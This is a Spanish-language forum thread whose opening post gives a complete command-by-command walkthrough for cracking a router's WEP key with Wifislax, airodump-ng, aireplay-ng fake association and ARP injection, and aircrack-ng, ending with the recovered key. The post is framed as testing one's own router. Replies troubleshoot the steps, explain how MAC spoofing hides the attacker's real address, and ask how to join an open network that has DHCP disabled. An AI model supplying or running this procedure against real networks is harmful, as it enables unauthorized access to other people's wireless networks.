Wifislax 3.1 con rtl 8185 54M

Iniciado por mark75mx, 19 Mayo 2008, 21:13 PM

0 Miembros y 2 Visitantes están viendo este tema.

mark75mx

COMPROBANDO LA SEGURIDAD DE NUESTRO RUTEADOR
Utilizando la tarjeta de red RTL 8185 54M en modo monitor con la distribución de Linux wifislax 3.1, vamos a ver los pasos necesarios para asegurarnos de que tenemos seguro nuestro ruteador.
1.- DESCARGAMOS EL CONTROLADOR ADECUADO DESDE REALTEK:
Esta se encuentra en la siguiente ruta:
http://www.realtek.com.tw/downloads/downloadsView.aspx?Langid=1&PNid=1&PFid=1&Level=6&Conn=5&DownTypeID=3&GetDown=false&Downloads=true#RTL8185L Ahí puedes elegir cualquier servidor
ftp://66.104.77.130/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz
ftp://152.104.238.19/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz
ftp://61.56.69.18/cn/wlan/rtl8185_linux_26[1].1027.0823.2007.tar.gz
NOTA: Guardamos el archivo descargado en la usb para posteriormente copiarlo en wifislax 3.1
2.- UNA VEZ REALIZADA LA DESCARGA PROCEDEMOS A DESCOMPRIMIR Y COMPILAR
#tar -xvf rtl8185_linux_26[1].1027.0823.2007.tar.gz
#cd rtl8185_linux_26.1027.0823.2007
#./makedrv
#./wlan0up
3.- AHORA PROBAMOS QUE REALMENTE YA ESTA LA TARJETA, SI ES EL CASO LO PONEMOS EN MODO MONITOR
#iwconfig
#ifconfig wlan0 down
#ifconfig wlan0 hw ether 11:22:33:44:55:66
#modprobe -r ath_pci
#modprobe ath_pci autocreate=monitor
#iwconfig wlan0 mode monitor
#iwconfig
4.- LO LEVANTAMOS
#ifconfig wlan0 up
5.- VAMOS A IDENTIFICAR NUESTRO RUTEADOR
#airodump-ng wlan0
Anotamos los datos mínimos necesarios tales como el ESSID,BSSID y MAC.
Ahora nos ubicamos adecuadamente en nuestro caso en rate 1 y canal 6
#iwconfig wlan0 rate 1M channel 6
6.- INICIAMOS AIRMON Y VERIFICAMOS QUE YA TENEMOS NUESTRA INTERFACE EN MODO MONITOR
#airmon-ng start wlan0
Vemos que nos da el siguiente resultado
Interface Chipset Driver
wlan0 RTL8187 r8187 (monitor mode enabled)
7.- EMPEZAMOS A CAPTURAR TRAFICO CON AIRODUMP
#airodump-ng -w pas6 -c 6 wlan0
Seleccionamos el SSID (INFINITUMXXXX) y la direccion MAC(XX:XX:XX:XX:XX:XX) para verificar la seguridad de nuestro ruteador
Dejamos abierta la ventana y en ejecucion airodump
8.- CREAMOS UNA ASOCIACION AP CON AIREPLAY-NG
Abrimos un nuevo shell y tecleamos lo siguiente:
#aireplay-ng -1 0 -e INFINITUMXXXX -a XX:XX.XX:XX:XX.XX -h 00:11:22:33:44:55 wlan0
En este punto vamos a intentarlo repetidamente hasta que obtengamos el mensaje:
Association successful :-)
9.- AHORA INYECTAMOS TRAFICO CON AIREPLAY
#aireplay-ng -3 -b XX:XX.XX:XX:XX.XX -h 00:11:22:33:44:55 wlan0
Vemos que se empiezan a enviar y recibir paquetes
Y si checamos la ventana donde esta trabajando airodump se ve que se empiezan a generar los IV's, aqui esperamos hasta llegar unos 160,000 aproximandamente
10.- VAMOS A SACAR LA CLAVE CON AIRCRACK
Revisamos que este el archivo .cap en la ruta actual
#ls
#cd rtl8185_linux_26.1027.0823.2007 (el mio se quedo aquí)
#aircrack-ng pas6-01.cap
Seleccionamos el router : 1
INFINITUMXXXX
Y en unos instantes obtenemos el key:
KEY FOUND [34:67:34:65:75]
11.- INTRODUCIMOS LA CLAVE A NUESTRA TARJETA
Reiniciamos la PC, (porque despues aunque cambiemos el modo a managed no se conecta), volvemos a cargar los drivers (paso2)
Lo levantamos por si acaso
#ifconfi wlan0 up

y checamos con:
#iwconfig wlan0

Nos conectamos con nuestra clave (NO LA DEL VECINO) desde
1) wifislax-asistencia herramientas-wireless
wifislax wireles

Introducimos
la interface: wlan0
el ssid:INFINITUMXXXX
el canal:6
la clave:3467346575

2) wifislax-asistencia herramientas-wireless
asistencia redes
dhcp

#ifconfig wlan0
13.- POR ULTIMO VERIFICAMOS CON PING Y A NAVEGAR EN INTERNET
#ping www.google.com.mx

¿Alguien sabe como hacer para que se conecte inmediatemente sin reiniciar ... muchas gracias?

ChimoC

Buenas:

Como que sin reiniciar?

Te refieres a ?

iwconfig INTERFAZ mode managed essid ESSID channel CANAL rate VELOCIDAd key KEY
dhcpcd INTERFAZ

Un saludo

ChimoC

mark75mx

Perdon, quise decir que reiniciar la pc (paso 11). Ya que al tratar de conectarme con:

iwconfig INTERFAZ mode managed essid ESSID channel CANAL rate VELOCIDAd key KEY
dhcpcd INTERFAZ

o desde el asistente.

No se conecta, ya intente agregando los datos (puerta de enlace, direccion ip, etc ... ) manualmente y tampoco.

Solo hasta que reinicio la pc y vuelvo a cargar los controladores lo hace.

Gracias y felicidades por el foro!!!

ronkitoloco

Hola mark75mx, estuve leyendo sobre los pasos que pones alla arriba y lo probe hasta el paso 5, pero no me detecta ninguna red, en el windows xp la misma tarjeta me detecta varias redes, quizás hice mal en algo, aunque estoy seguro que seguí al pie de la letra todo lo indicado.
Tnego unas cuantas dudas y ojala me puedas ayudar:
1º En el paso 3 manifiestas que probemos si ya está la tarjeta, y no sé como hacerlo, aunque tengo una idea como que es con el iwconfig, la verdad no estoy seguro, bueno luego de poner ese comando me resulta lo siguiente:
lo                  no wireless extensions
wlan0            802.11b/g     Mode: Managed       frequency=2.462GHz
                    Acces Point: Not-Associated         Bit Rate: 11Mb/s
                    Retry: on         RTS thr:off           Fragment thr:off
                    Encryption key:off
                    Link Quality:0        Signal Level:0     Noise level:0
                    Rx invalid nwid: 0       Rx invalid cryp: 0       Rx invalid frag: 0
                    Tx excessive netries:0      Invalid misc:0    Missedbeacon: 0

¿qué significa Retry, RTS thr, Fragment thr, y porqué tengo los dos últimos como apagados u off?
2º  Los número que das en:
       #ifconfig wlan0 hw ether 11:22:33:44:55:66 que significa y esta bien que lo ponga tal y como está (me refiero al 11:22:...:66)

3º  En el punto 8 indicas: 
     #aireplay-ng -1 0 -e INFINITUMXXXX -a XX:XX.XX:XX:XX.XX -h 00:11:22:33:44:55 wlan0
¿INFINITUMXXXX es el nombre de la SSID, y se coloca con infinitum en frente del nombre o solo el nombre?
Bueno amigo estaré esperando tu ayuda y gracias por poner la guía de como hacer funcionar el realtek 8185.
PD: las preguntas quizás te parezcan algo como para principiantes pero la verdad es que si soy principiante en esto del mundo de linux. Gracias nuevamente y suerte.
Ah! si alguien más sabe la respuesta agradecería bastante que me ayuden.
Saludos. :D
   

sousuke sagara

hola mark75mx estuve leyendo tu post y me sirvio de mucha ayuda infinitas gracias, pero me gustaria saber como puedo hacer para configurarla red manual ya sabes ip,puerta de enlase,dns, que la red que veo esta abierta pero no puedo conectarme a la red, supongo que se debe a que el router esta desactivado el DHCP.

en resumen con que ip,enlace,dns puedo entrar a la red

niki40

Hola Mark.
Excelente tu post y muy instructivo, pero me encontré con un problema y no pude seguir. Lo copio abajo:

rm -f *.mod.c *.mod *.o .*.cmd *.ko
rm -rf /home/e-smith/files/ibays/Primary/files/rtl8185_linux_26.1027.0823.2007/ieee80211/tmp
make -C /lib/modules/2.6.9-78.0.8.EL/build M=/home/e-smith/files/ibays/Primary/files/rtl8185_linux_26.1027.0823.2007/ieee80211 CC=gcc modules
make: *** /lib/modules/2.6.9-78.0.8.EL/build: No existe el fichero o el directorio.  Alto.
make: *** [modules] Error 2
rm -f *.mod.c *.mod *.o .*.cmd *.ko *~
rm -rf /home/e-smith/files/ibays/Primary/files/rtl8185_linux_26.1027.0823.2007/rtl8185/tmp
make -C /lib/modules/2.6.9-78.0.8.EL/build M=/home/e-smith/files/ibays/Primary/files/rtl8185_linux_26.1027.0823.2007/rtl8185 CC=gcc modules
make: *** /lib/modules/2.6.9-78.0.8.EL/build: No existe el fichero o el directorio.  Alto.
make: *** [modules] Error 2


Alguna idea? Estoy instalando en un servidor sme de Mittel

Saludos y gracias!!!

codegateway

#6
para ronkitoloco:
1ro. se prueba si ya está la tarjeta con el comando:
iwconfig
a vos te resultó que si al aparecerte wlan0 (la cual es tu tarjeta)

2do. en linux, para saber que hace cualquier comando se teclea, por ejem:
man ifconfig
o mas breve información:
ifconfig --help

Al ingresar:
ifconfig wlan0 hw ether 11:22:33:44:55:66
estás ocultando tu verdadera MAC, reemplazándola por 11:22:33:44:55:66
(no se porqué tanto interés en ocultar la MAC por acá-)
Sin este comando, u otros que también lo hacen, los paquetes que
emitirias al aire llevarían el verdadero valor de MAC de tu placa.
Algunos AP podrían ignorar tus paquetes si reemplazas tu MAC por una inválida, osea, una que no corresponda a algún fabricante real de placas, indicado por los primeros tres pares de números. Una MAC válida no debería tener el segundo número impar, así que 11:... no sería una buena elección. Ante alguna duda, lo mas conveniente sería modificar solo los últimos tres pares de números de la MAC de tu placa, evitándose así que la inyección sea inútil (ignorada).
fuente: darkaudax en
http://www.aircrack-ng.org/doku.php?id=faq

3ro. similarmente:
man aireplay-ng
o
aireplay-ng --help

"INFINITUMXXXX" es el essid, o nombre del AP, reemplazalo por el del que querés asociarte, por otro ejemplo: "fulanito1234"
XX:XX.XX:XX:XX.XX es la MAC del mismo AP al que querés asociarte, reemplazalo por la correcta cuando la sepas.
Con -h 00:11:22:33:44:55 estás nuevamente ocultando la MAC de tu placa...

saludos! lástima que pasó tanto tiempo no?

superogt

saludos, oye una cosa que yo he probado en ubuntu cuando no me deja moverle es quitar los controladores y ponerlos de nuevo, lease

modprobe -r ath_pci
modprobe ath_pci


Prueba si te sirve y nos cuentas, muy instructivo tu manual, creo que lo hare en la maquina de un amigo por que yo ya lo hago con la lap pero tiene sus limitantes.

sadfre

#8
hola disculpen pero yo tengo un problema al inyectar trafico, en relidad no inyecta, a pesar de lograr asociarme. en alguna parte lei que la rtl8185 no inyectaba, puede deberse a eso o estoy haciendo algo mal???, incluso le cambie los numero a la mac, por si se devia a que los AP la encontraban invalida. si pudieran ayudarme o darle alguna idea de lo que pudiese estar pasando...  muchas grax
---------
ok grax

ChimoC

Buenas:

Porque estaras haciendo una inyecciçon sobre un cliente falso [A1+A3]

Abre un nuevo post y no uses este para preguntar....

Un saludo

ChimoC